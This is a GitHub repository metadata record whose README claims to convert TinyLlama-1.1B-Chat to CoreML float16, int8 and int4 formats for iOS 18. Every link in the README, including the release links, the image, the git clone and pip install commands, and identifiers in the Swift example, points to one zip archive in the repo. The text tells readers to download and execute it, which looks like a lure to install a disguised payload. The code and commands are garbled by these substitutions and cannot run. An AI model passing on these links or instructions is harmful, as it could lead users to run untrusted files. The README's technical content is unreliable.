{"id":28463815,"url":"https://github.com/ambv231/tinyllama-coreml-ios18-quantization","last_synced_at":"2026-04-30T12:34:41.811Z","repository":{"id":294763452,"uuid":"987905315","full_name":"ambv231/tinyllama-coreml-ios18-quantization","owner":"ambv231","description":"Quantize TinyLlama-1.1B-Chat from PyTorch to CoreML (float16, int8, int4) for efficient on-device inference on iOS 18+.","archived":false,"fork":false,"pushed_at":"2026-04-30T10:16:48.000Z","size":579,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-04-30T12:34:16.225Z","etag":null,"topics":["ai","apple-silicon","coreml","huggingface","int4","int8","ios18","llama","llm","mlpackage","mobile","nlp","on-device","pytorch","quantization","tinyllama","transformers"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ambv231.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-05-21T19:03:43.000Z","updated_at":"2026-04-30T10:16:52.000Z","dependencies_parsed_at":"2026-01-20T01:02:47.593Z","dependency_job_id":null,"html_url":"https://github.com/ambv231/tinyllama-coreml-ios18-quantization","commit_stats":null,"previous_names":["ambv231/tinyllama-coreml-ios18-quantization"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ambv231/tinyllama-coreml-ios18-quantization","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ambv231%2Ftinyllama-coreml-ios18-quantization","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ambv231%2Ftinyllama-coreml-ios18-quantization/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ambv231%2Ftinyllama-coreml-ios18-quantization/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ambv231%2Ftinyllama-coreml-ios18-quantization/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ambv231","download_url":"https://codeload.github.com/ambv231/tinyllama-coreml-ios18-quantization/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ambv231%2Ftinyllama-coreml-ios18-quantization/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32465009,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-29T22:27:22.272Z","status":"online","status_checked_at":"2026-04-30T02:00:05.929Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai","apple-silicon","coreml","huggingface","int4","int8","ios18","llama","llm","mlpackage","mobile","nlp","on-device","pytorch","quantization","tinyllama","transformers"],"created_at":"2025-06-07T05:01:00.724Z","updated_at":"2026-04-30T12:34:41.805Z","avatar_url":"https://github.com/ambv231.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# TinyLlama CoreML iOS 18 Quantization 🦙📱\n\nWelcome to the **TinyLlama CoreML iOS 18 Quantization** repository! This project focuses on converting the TinyLlama-1.1B-Chat model from PyTorch to CoreML formats such as float16, int8, and int4. This conversion allows for efficient on-device inference on iOS 18 and later. \n\nYou can find the latest releases [here](https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip). Download the necessary files and execute them to get started.\n\n## Table of Contents\n\n- [Overview](#overview)\n- [Features](#features)\n- [Installation](#installation)\n- [Usage](#usage)\n- [Model Details](#model-details)\n- [Quantization Techniques](#quantization-techniques)\n- [Supported Formats](#supported-formats)\n- [Contributing](#contributing)\n- [License](#license)\n- [Contact](#contact)\n\n## Overview\n\nTinyLlama is a state-of-the-art language model designed for mobile applications. By quantizing this model, we make it lightweight and efficient for use on iOS devices. This repository provides the tools necessary to convert and optimize the TinyLlama model, ensuring it runs smoothly on Apple Silicon.\n\n![TinyLlama](https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip)\n\n## Features\n\n- **Efficient Quantization**: Convert models to float16, int8, and int4 formats.\n- **On-Device Inference**: Optimized for iOS 18 and later.\n- **Easy Integration**: Simple setup for developers.\n- **Hugging Face Compatibility**: Leverage the power of Hugging Face transformers.\n\n## Installation\n\nTo install the necessary tools and libraries, follow these steps:\n\n1. Clone the repository:\n   ```bash\n   git clone https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip\n   cd tinyllama-coreml-ios18-quantization\n   ```\n\n2. Install dependencies using pip:\n   ```bash\n   pip install -r https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip\n   ```\n\n3. Ensure you have the latest version of Xcode installed on your machine.\n\n4. Download the latest model files from the [Releases](https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip) section.\n\n## Usage\n\nAfter installation, you can begin using the TinyLlama model in your iOS applications. Here's a simple example of how to load and use the model:\n\n```swift\nimport CoreML\n\nguard let model = try? TinyLlama(configuration: MLModelConfiguration()) else {\n    fatalError(\"Could not load model\")\n}\n\n// Perform inference\nlet input = TinyLlamaInput(text: \"Hello, world!\")\nlet output = try? https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip(input: input)\nprint(https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip ?? \"No response\")\n```\n\n## Model Details\n\n### TinyLlama-1.1B-Chat\n\n- **Parameters**: 1.1 billion\n- **Architecture**: Transformer-based\n- **Training Data**: Diverse datasets for improved language understanding\n\n### Supported Formats\n\n- **float16**: A half-precision floating-point format that reduces memory usage.\n- **int8**: An 8-bit integer format for faster computations.\n- **int4**: A 4-bit integer format for even smaller model sizes.\n\n## Quantization Techniques\n\nQuantization is the process of mapping a large set of values to a smaller set. In the context of machine learning, it helps in reducing the model size and improving inference speed without significantly sacrificing accuracy. \n\n### Techniques Used\n\n1. **Post-Training Quantization**: This technique applies quantization after the model has been trained. It allows for efficient conversion with minimal loss in performance.\n\n2. **Dynamic Quantization**: This approach quantizes weights on-the-fly during inference, allowing for flexibility and speed.\n\n3. **Quantization-Aware Training**: This method involves training the model with quantization in mind, helping it adapt to the reduced precision.\n\n## Contributing\n\nWe welcome contributions to improve this project. If you want to help, please follow these steps:\n\n1. Fork the repository.\n2. Create a new branch for your feature or bug fix.\n3. Make your changes and commit them.\n4. Push your changes to your fork.\n5. Submit a pull request.\n\nPlease ensure your code adheres to the project's coding standards and includes relevant tests.\n\n## License\n\nThis project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.\n\n## Contact\n\nFor questions or support, please open an issue on GitHub or contact the repository owner.\n\nYou can also find the latest releases [here](https://raw.githubusercontent.com/ambv231/tinyllama-coreml-ios18-quantization/main/nonequilibrium/quantization_coreml_ios_tinyllama_v2.1.zip). Download the files you need and start working with TinyLlama today!\n\n---\n\nThis README provides an overview of the TinyLlama CoreML iOS 18 Quantization project. For further details and updates, please check the repository frequently.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fambv231%2Ftinyllama-coreml-ios18-quantization","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fambv231%2Ftinyllama-coreml-ios18-quantization","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fambv231%2Ftinyllama-coreml-ios18-quantization/lists"}